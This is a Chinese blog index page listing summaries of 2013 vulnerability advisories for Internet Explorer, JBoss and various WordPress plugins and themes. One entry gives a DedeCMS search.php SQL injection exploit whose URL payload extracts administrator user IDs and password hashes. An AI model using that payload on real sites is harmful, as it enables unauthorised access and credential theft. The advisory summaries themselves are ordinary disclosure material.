2013年2月4日
Microsoft Internet Explorer 信息泄露漏洞
摘要: 漏洞版本:Microsoft Internet Explorer 9Microsoft Internet Explorer 8漏洞描述:Bugtraq ID:57640CVE ID: CVE-2013-1450Microsoft Internet Explorer是一款流行的WEB浏览器。在Microsoft Internet Explorer代理服务设置中,如果HTTP和Secure栏中具有相同代理地址和端口,I没有正确重用TCP会话,通过构建特制HTML文档,触发多个HTTPS请求,然后触发一个对该主机的HTTP请求,可获得特定主机的敏感信息。<* 参考http://pastebin 阅读全文
posted @ 2013-02-04 20:28 夏虫xm 阅读(207) 评论(0) 推荐(0)
2013年2月1日
JBoss Enterprise Application Platform SecurityAssociation.getCredential() 安全绕过漏洞
摘要: 漏洞版本:JBoss Group JBoss Enterprise Web Platform for RHEL 5 Server 5JBoss Group JBoss Enterprise Web Platform for RHEL 4ES 5JBoss Group JBoss Enterprise Web Platform for RHEL 4AS 5漏洞描述:BUGTRAQ ID: 57550CVE(CAN) ID: CVE-2012-3370JBoss企业应用平台(JBoss Enterprise Application Platform,EAP)是J2EE应用的中间件平台。JBoss. 阅读全文
posted @ 2013-02-01 10:00 夏虫xm 阅读(265) 评论(0) 推荐(0)
2013年1月30日
WordPress 多个安全漏洞
摘要: 漏洞名称:WordPress 多个安全漏洞CNNVD编号:CNNVD-201301-532发布时间:2013-01-30更新时间:2013-01-30危害等级: 漏洞类型:输入验证威胁类型:远程CVE编号:漏洞来源:Jon Cave, Gennady Kovshenin and Ryan DewhurstWordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress早期版本至3.5.1版本中存在信息泄露漏洞和多个HTML注入漏洞。攻击者利用这些漏洞在受影响浏览器上下文中运行恶意的HTML和脚本代码,潜在的允许攻击者窃取 阅读全文
posted @ 2013-01-30 17:11 夏虫xm 阅读(202) 评论(0) 推荐(0)
WordPress Chocolate WP 主题多个安全漏洞
摘要: 漏洞名称:WordPress Chocolate WP 主题多个安全漏洞CNNVD编号:CNNVD-201301-536发布时间:2013-01-30更新时间:2013-01-30危害等级: 漏洞类型:威胁类型:远程CVE编号:漏洞来源:Eugene DokukinWordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress中的Chocolate WP主题中存在多个安全漏洞。攻击者利用这些漏洞导致拒绝服务状态,上传任意文件到受影响计算机,或在受影响站点上下文中不知情用户浏览器上执行任意脚本代码。窃取基于cookie认 阅读全文
posted @ 2013-01-30 17:11 夏虫xm 阅读(161) 评论(0) 推荐(0)
WordPress Plupload插件未明跨站脚本漏洞
摘要: 漏洞名称:WordPress Plupload插件未明跨站脚本漏洞CNNVD编号:CNNVD-201301-531发布时间:2013-01-30更新时间:2013-01-30危害等级: 漏洞类型:跨站脚本威胁类型:远程CVE编号:漏洞来源:MoxiecodeWordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress中的Plupload插件早期版本至1.5.5版本中存在未明跨站脚本漏洞。攻击者利用该漏洞在受影响站点上下文中不知情用户浏览器上执行任意脚本代码,可窃取基于cookie认证证书进而发起其他攻击。 ... 阅读全文
posted @ 2013-01-30 17:09 夏虫xm 阅读(319) 评论(0) 推荐(0)
dedecms plus/search.php 注入漏洞利用EXP
摘要: 测试例子:提交webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的expwebshell.cc/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,3 阅读全文
posted @ 2013-01-30 09:55 夏虫xm 阅读(1163) 评论(0) 推荐(0)
2013年1月28日
JBoss Enterprise Portal Platform多个跨站脚本执行漏洞
摘要: 漏洞版本:RedHat Enterprise Portal Platform 5.x漏洞描述:BUGTRAQ ID: 57521CVE(CAN) ID: CVE-2012-5531JBoss Enterprise Portal Platform是构建和管理动态网站的平台。JBoss Enterprise Portal Platform 5.2.2内的GateIn Portal中存在多个XSS漏洞,可允许远程攻击者通过特制URL注入任意脚本代码。<* 参考http://secunia.com/advisories/51775*> 阅读全文
posted @ 2013-01-28 23:27 夏虫xm 阅读(167) 评论(0) 推荐(0)
2013年1月25日
WordPress WP Photo Album Plus插件‘wppa-tag’跨站脚本漏洞
摘要: 漏洞名称:WordPress WP Photo Album Plus插件‘wppa-tag’跨站脚本漏洞CNNVD编号:CNNVD-201301-458发布时间:2013-01-24更新时间:2013-01-24危害等级:漏洞类型:跨站脚本威胁类型:远程CVE编号:WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。WordPress中的WP Photo Album Plus插件中存在跨站脚本漏洞,该漏洞源于程序没有正确验证用户提供的输入。攻击者利用该漏洞在受影响站点上下文中不知情用户浏览器上执行任意脚本代码,可窃取基于cook 阅读全文
posted @ 2013-01-25 20:37 夏虫xm 阅读(233) 评论(0) 推荐(0)
WordPress NextGEN Gallery插件‘test-head’参数跨站脚本漏洞
摘要: 漏洞名称:WordPress NextGEN Gallery插件‘test-head’参数跨站脚本漏洞CNNVD编号:CNNVD-201301-466发布时间:2013-01-24更新时间:2013-01-24危害等级:漏洞类型:跨站脚本威胁类型:远程CVE编号:漏洞来源:Am!rWordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。WordPress中的NextGEN Gallery插件中的test-head参数中存在跨站脚本漏洞,该漏洞源于没有正确验证用户提供的输入。攻击者利用该漏洞在受影响站点上下文中不之前用户浏览器上执行任 阅读全文
posted @ 2013-01-25 20:36 夏虫xm 阅读(118) 评论(0) 推荐(0)
WordPress organizer/page/users.php脚本多个跨站脚本漏洞
摘要: 漏洞名称:WordPress organizer/page/users.php脚本多个跨站脚本漏洞CNNVD编号:CNNVD-201301-482发布时间:2013-01-24更新时间:2013-01-24危害等级:中危漏洞类型:跨站脚本威胁类型:远程CVE编号:CVE-2012-6511WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。WordPress中的Organizer插件1.2.1版本中的organizer/page/users.php脚本中存在多个跨站脚本漏洞。通过‘Update Setting’操作中的(1)de 阅读全文
posted @ 2013-01-25 20:35 夏虫xm 阅读(142) 评论(0) 推荐(0)